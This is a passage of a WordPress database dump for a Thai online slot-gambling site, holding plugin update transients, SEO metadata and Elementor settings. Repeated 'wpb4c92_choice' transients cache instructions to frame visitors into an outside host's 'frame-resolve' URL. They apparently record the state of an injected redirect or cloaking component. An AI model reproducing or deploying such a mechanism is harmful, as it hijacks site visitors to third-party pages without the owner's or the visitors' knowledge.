oad\";s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:5:\"icons\";a:1:{s:3:\"svg\";s:61:\"https://assets.elementor.com/miscellaneous/v1/images/icon.svg\";}s:12:\"requires_php\";s:3:\"7.4\";s:6:\"plugin\";s:31:\"elementor-pro/elementor-pro.php\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:7:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.7.2\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:61:\"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:42:\"w.org/plugins/all-404-redirect-to-homepage\";s:4:\"slug\";s:28:\"all-404-redirect-to-homepage\";s:6:\"plugin\";s:61:\"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php\";s:11:\"new_version\";s:3:\"5.7\";s:3:\"url\";s:59:\"https://wordpress.org/plugins/all-404-redirect-to-homepage/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/all-404-redirect-to-homepage.5.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/all-404-redirect-to-homepage/assets/icon-256x256.png?rev=1515215\";s:2:\"1x\";s:81:\"https://ps.w.org/all-404-redirect-to-homepage/assets/icon-128x128.png?rev=1515215\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:83:\"https://ps.w.org/all-404-redirect-to-homepage/assets/banner-772x250.png?rev=2281110\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"4.2.4\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.4.2.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.gif?rev=3444228\";s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.gif?rev=3444228\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=3443226\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=3443226\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.8\";}s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:35:\"litespeed-cache/litespeed-cache.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/litespeed-cache\";s:4:\"slug\";s:15:\"litespeed-cache\";s:6:\"plugin\";s:35:\"litespeed-cache/litespeed-cache.php\";s:11:\"new_version\";s:5:\"7.9.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/litespeed-cache/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/litespeed-cache.7.9.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/litespeed-cache/assets/icon-256x256.png?rev=2554181\";s:2:\"1x\";s:68:\"https://ps.w.org/litespeed-cache/assets/icon-128x128.png?rev=2554181\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/litespeed-cache/assets/banner-1544x500.png?rev=2554181\";s:2:\"1x\";s:70:\"https://ps.w.org/litespeed-cache/assets/banner-772x250.png?rev=2554181\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:6:\"1.26.7\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/updraftplus.1.26.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.2\";}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"28.4\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.28.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.gif?rev=3419908\";s:2:\"1x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-128x128.gif?rev=3419908\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=3257862\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=3257862\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=3257862\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=3257862\";}s:8:\"requires\";s:3:\"6.9\";}}s:7:\"checked\";a:9:{s:19:\"akismet/akismet.php\";s:5:\"5.7.2\";s:61:\"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php\";s:3:\"5.7\";s:23:\"elementor/elementor.php\";s:5:\"4.2.4\";s:31:\"elementor-pro/elementor-pro.php\";s:5:\"4.2.3\";s:9:\"hello.php\";s:5:\"1.7.2\";s:37:\"imunify-security/imunify-security.php\";s:5:\"2.1.0\";s:35:\"litespeed-cache/litespeed-cache.php\";s:5:\"7.9.1\";s:27:\"updraftplus/updraftplus.php\";s:6:\"1.26.7\";s:24:\"wordpress-seo/wp-seo.php\";s:4:\"28.4\";}}','off'),(92484,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1788571011;s:7:\"checked\";a:4:{s:15:\"hello-elementor\";s:5:\"3.5.1\";s:16:\"twentytwentyfive\";s:3:\"1.5\";s:16:\"twentytwentyfour\";s:3:\"1.6\";s:17:\"twentytwentythree\";s:3:\"1.7\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:4:{s:15:\"hello-elementor\";a:6:{s:5:\"theme\";s:15:\"hello-elementor\";s:11:\"new_version\";s:5:\"3.5.1\";s:3:\"url\";s:45:\"https://wordpress.org/themes/hello-elementor/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/hello-elementor.3.5.1.zip\";s:8:\"requires\";s:3:\"6.0\";s:12:\"requires_php\";s:3:\"7.4\";}s:16:\"twentytwentyfive\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfive\";s:11:\"new_version\";s:3:\"1.5\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfive/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfive.1.5.zip\";s:8:\"requires\";s:3:\"6.7\";s:12:\"requires_php\";s:3:\"7.2\";}s:16:\"twentytwentyfour\";a:6:{s:5:\"theme\";s:16:\"twentytwentyfour\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:46:\"https://wordpress.org/themes/twentytwentyfour/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/twentytwentyfour.1.6.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.7.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','off'),(92495,'_transient_timeout_wpb4c92_choice_34157f441d6a4909ce0c6cdf390b6ee5','1788560751','off'),(92496,'_transient_wpb4c92_choice_34157f441d6a4909ce0c6cdf390b6ee5','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92500,'_transient_timeout_wpb4c92_choice_5a8b9b4984adc86a846e3d5f1c356ada','1788561420','off'),(92501,'_transient_wpb4c92_choice_5a8b9b4984adc86a846e3d5f1c356ada','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92514,'_transient_timeout_wpb4c92_choice_2499a304fd081a053d013ecdf3d5335c','1788563511','off'),(92515,'_transient_wpb4c92_choice_2499a304fd081a053d013ecdf3d5335c','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92518,'_transient_timeout_wpb4c92_choice_d1ef709bb8ee7943a8c55e20f47d9685','1788564087','off'),(92519,'_transient_wpb4c92_choice_d1ef709bb8ee7943a8c55e20f47d9685','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92522,'_transient_timeout_wpb4c92_choice_8a15e65a3abddc0253f01601853dfcb5','1788564665','off'),(92523,'_transient_wpb4c92_choice_8a15e65a3abddc0253f01601853dfcb5','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92557,'_transient_timeout_wpb4c92_choice_075e778303e854f093cb8cecf9288367','1788569233','off'),(92558,'_transient_wpb4c92_choice_075e778303e854f093cb8cecf9288367','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92572,'updraft_combine_jobs_around','1788657049','on'),(92573,'_site_transient_timeout_theme_roots','1788572811','off'),(92574,'_site_transient_theme_roots','a:4:{s:15:\"hello-elementor\";s:7:\"/themes\";s:16:\"twentytwentyfive\";s:7:\"/themes\";s:16:\"twentytwentyfour\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";}','off'),(92576,'_transient_timeout_wpb4c92_choice_9f3fb1a17880658316e59d514333f14e','1788571417','off'),(92577,'_transient_wpb4c92_choice_9f3fb1a17880658316e59d514333f14e','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92580,'_transient_timeout_wpb4c92_choice_c510cef22327f02120603a2a638cf7f4','1788573039','off'),(92581,'_transient_wpb4c92_choice_c510cef22327f02120603a2a638cf7f4','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92586,'wpb4c92_version_purged_v121_8df45e73e003695f25d5c6ea35fee515','a:4:{s:7:\"version\";s:5:\"1.2.1\";s:5:\"phase\";s:5:\"ready\";s:8:\"adapters\";a:0:{}s:4:\"path\";s:64:\"c9e1b28e3f633d4dab896598992bdfc98ebb6dd420e92136a962503e617b311c\";}','off'),(92588,'_transient_timeout_wpb4c92_choice_8f957c9f5bdd59a53b712a15097c1d8f','1788573977','off'),(92589,'_transient_wpb4c92_choice_8f957c9f5bdd59a53b712a15097c1d8f','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92592,'_transient_timeout_wpb4c92_choice_e0725109549d4e2b36be6923c023ab46','1788573829','off'),(92593,'_transient_wpb4c92_choice_e0725109549d4e2b36be6923c023ab46','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92633,'_transient_timeout_wpb4c92_choice_042a301764eb757b882b8dd12100e678','1788577377','off'),(92634,'_transient_wpb4c92_choice_042a301764eb757b882b8dd12100e678','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92638,'_transient_timeout_wpb4c92_choice_73254e5d8bebfd9b3db3196bdae5568d','1788577712','off'),(92639,'_transient_wpb4c92_choice_73254e5d8bebfd9b3db3196bdae5568d','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92655,'_transient_timeout_wpb4c92_choice_6144b85edbd53283ba593d2020dcdd72','1788579705','off'),(92656,'_transient_wpb4c92_choice_6144b85edbd53283ba593d2020dcdd72','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92661,'_transient_timeout_wpb4c92_choice_7f77787117f4267a53f79e185dc92b55','1788579819','off'),(92662,'_transient_wpb4c92_choice_7f77787117f4267a53f79e185dc92b55','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92664,'_transient_timeout_wpb4c92_choice_3f6ae820acf8cdd3f4a335b583183d29','1788580010','off'),(92665,'_transient_wpb4c92_choice_3f6ae820acf8cdd3f4a335b583183d29','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92670,'_transient_timeout_wpb4c92_choice_73f24514f8c51aaf8efa4809c7c03faa','1788581202','off'),(92671,'_transient_wpb4c92_choice_73f24514f8c51aaf8efa4809c7c03faa','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92676,'_transient_timeout_wpb4c92_choice_e99241a1c7014873c3eda407cf886e66','1788581939','off'),(92677,'_transient_wpb4c92_choice_e99241a1c7014873c3eda407cf886e66','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92680,'_transient_timeout_wpb4c92_choice_9e833102dd6d426e6613afc325b25f50','1788582403','off'),(92681,'_transient_wpb4c92_choice_9e833102dd6d426e6613afc325b25f50','a:3:{s:6:\"action\";s:4:\"none\";s:3:\"url\";s:0:\"\";s:3:\"ttl\";i:600;}','off'),(92687,'_transient_timeout_wpb4c92_choice_c071b529e20b5d761760146133148c49','1788582460','off'),(92688,'_transient_wpb4c92_choice_c071b529e20b5d761760146133148c49','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92690,'_transient_timeout_wpb4c92_choice_ddf848332b87ea4ca0d20d2a2832aa07','1788583165','off'),(92691,'_transient_wpb4c92_choice_ddf848332b87ea4ca0d20d2a2832aa07','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92735,'_transient_timeout_wpb4c92_choice_e3c0cc526ada456d84c548957008d7fe','1788593247','off'),(92736,'_transient_wpb4c92_choice_e3c0cc526ada456d84c548957008d7fe','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92740,'_transient_timeout_wpb4c92_choice_06fec455be5d401778488cab21126848','1788593456','off'),(92741,'_transient_wpb4c92_choice_06fec455be5d401778488cab21126848','a:3:{s:6:\"action\";s:5:\"frame\";s:3:\"url\";s:119:\"https://dillduck24.info/vitrina/api/frame-resolve/v2/PJd5XgxqnIRZg8AH2k1Qu7_ckyCGCSQnejEiKluio3A?source_host=amb18b.com\";s:3:\"ttl\";i:300;}','off'),(92752,'_transient_timeout_wpb4c92_failures_v1','1788595901','off'),(92753,'_transient_wpb4c92_failures_v1','a:1:{s:5:\"count\";i:1;}','off'),(92768,'_transient_timeout_imunify_security_rules_1771809148_1463','1788623727','off'),(92769,'_transient_imunify_security_rules_1771809148_1463','a:2:{s:7:\"version\";s:5:\"0.0.1\";s:5:\"rules\";a:0:{}}','off'),(92782,'_site_transient_timeout_wp_theme_files_patterns-f3c28e25299b3f403ddd7ba1cba60585','1788608100','off'),(92783,'_site_transient_wp_theme_files_patterns-f3c28e25299b3f403ddd7ba1cba60585','a:2:{s:7:\"version\";s:5:\"3.5.1\";s:8:\"patterns\";a:0:{}}','off'),(92785,'_elementor_design_system_sync_css_meta','a:2:{s:4:\"time\";i:1788606391;i:0;b:0;}','auto');
/*!40000 ALTER TABLE `IwGJ28BV_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `IwGJ28BV_postmeta`
--
DROP TABLE IF EXISTS `IwGJ28BV_postmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `IwGJ28BV_postmeta` (
`meta_id` bigint unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint unsigned NOT NULL DEFAULT '0',
`meta_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
`meta_value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci,
PRIMARY KEY (`meta_id`),
KEY `post_id` (`post_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3599 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `IwGJ28BV_postmeta`
--
LOCK TABLES `IwGJ28BV_postmeta` WRITE;
/*!40000 ALTER TABLE `IwGJ28BV_postmeta` DISABLE KEYS */;
INSERT INTO `IwGJ28BV_postmeta` VALUES (2,3,'_wp_page_template','default'),(3,7,'_elementor_edit_mode','builder'),(4,7,'_elementor_template_type','kit'),(12,7,'_edit_lock','1772134121:3'),(37,16,'_edit_lock','1772133991:3'),(38,16,'_edit_last','3'),(39,16,'_yoast_wpseo_focuskw','ทดลองเล่นสล็อต'),(40,16,'_yoast_wpseo_title','ทดลองเล่นสล็อต รวมทุกค่าย เว็บใหม่มาแรง API แท้ จาก USA'),(41,16,'_yoast_wpseo_metadesc','ทดลองเล่นสล็อต AMB18 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว เว็บใหม่มาแรง API แท้ จาก USA สมัครยูสใหม่รับโบนัสฟรีทุกวัน'),(42,16,'_yoast_wpseo_linkdex','57'),(43,16,'_yoast_wpseo_content_score','90'),(44,16,'_yoast_wpseo_estimated-reading-time-minutes','1'),(45,16,'_elementor_edit_mode','builder'),(46,16,'_elementor_template_type','wp-page'),(47,16,'_elementor_version','3.35.5'),(48,16,'_elementor_pro_version','3.32.3'),(49,18,'_elementor_edit_mode','builder'),(50,18,'_elementor_template_type','kit'),(52,7,'_wp_page_template','default'),(53,7,'_elementor_page_settings','a:56:{s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#99CC00\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#99CC00\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#FFFFFF\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#99CC00\";}}s:13:\"custom_colors\";a:0:{}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Prompt\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:9:\"site_name\";s:5:\"AMB18\";s:19:\"page_title_selector\";s:14:\"h1.entry-title\";s:25:\"hello_header_logo_display\";s:0:\"\";s:28:\"hello_header_tagline_display\";s:0:\"\";s:25:\"hello_header_menu_display\";s:0:\"\";s:25:\"hello_footer_logo_display\";s:0:\"\";s:28:\"hello_footer_tagline_display\";s:0:\"\";s:25:\"hello_footer_menu_display\";s:0:\"\";s:30:\"hello_footer_copyright_display\";s:0:\"\";s:27:\"hello_footer_copyright_text\";s:19:\"All rights reserved\";s:11:\"viewport_md\";i:768;s:11:\"viewport_lg\";i:1025;s:32:\"colors_enable_styleguide_preview\";s:3:\"yes\";s:36:\"typography_enable_styleguide_preview\";s:3:\"yes\";s:10:\"body_color\";s:7:\"#FFFFFF\";s:26:\"body_typography_typography\";s:6:\"custom\";s:27:\"body_typography_font_family\";s:6:\"Prompt\";s:25:\"body_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:17:\"link_normal_color\";s:7:\"#F5D708\";s:33:\"link_normal_typography_typography\";s:6:\"custom\";s:34:\"link_normal_typography_font_family\";s:6:\"Prompt\";s:32:\"link_normal_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:24:\"h1_typography_typography\";s:6:\"custom\";s:25:\"h1_typography_font_family\";s:6:\"Prompt\";s:23:\"h1_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:29;s:5:\"sizes\";a:0:{}}s:24:\"h2_typography_typography\";s:6:\"custom\";s:25:\"h2_typography_font_family\";s:6:\"Prompt\";s:23:\"h2_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:26;s:5:\"sizes\";a:0:{}}s:24:\"h3_typography_typography\";s:6:\"custom\";s:25:\"h3_typography_font_family\";s:6:\"Prompt\";s:23:\"h3_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:24;s:5:\"sizes\";a:0:{}}s:24:\"h4_typography_typography\";s:6:\"custom\";s:25:\"h4_typography_font_family\";s:6:\"Prompt\";s:23:\"h4_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:24:\"h5_typography_typography\";s:6:\"custom\";s:25:\"h5_typography_font_family\";s:6:\"Prompt\";s:23:\"h5_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:24:\"h6_typography_typography\";s:6:\"custom\";s:25:\"h6_typography_font_family\";s:6:\"Prompt\";s:23:\"h6_typography_font_size\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:26:\"body_background_background\";s:7:\"classic\";s:21:\"body_background_color\";s:9:\"#0A0606FA\";s:30:\"h1_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:22;s:5:\"sizes\";a:0:{}}s:30:\"h2_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:20;s:5:\"sizes\";a:0:{}}s:30:\"h3_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:18;s:5:\"sizes\";a:0:{}}s:30:\"h4_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:17;s:5:\"sizes\";a:0:{}}s:30:\"h5_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:30:\"h6_typography_font_size_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:16;s:5:\"sizes\";a:0:{}}s:15:\"activeItemIndex\";i:1;s:16:\"site_description\";s:84:\"AMB18 สล็อต แตก ง่าย ทุน น้อย วอ 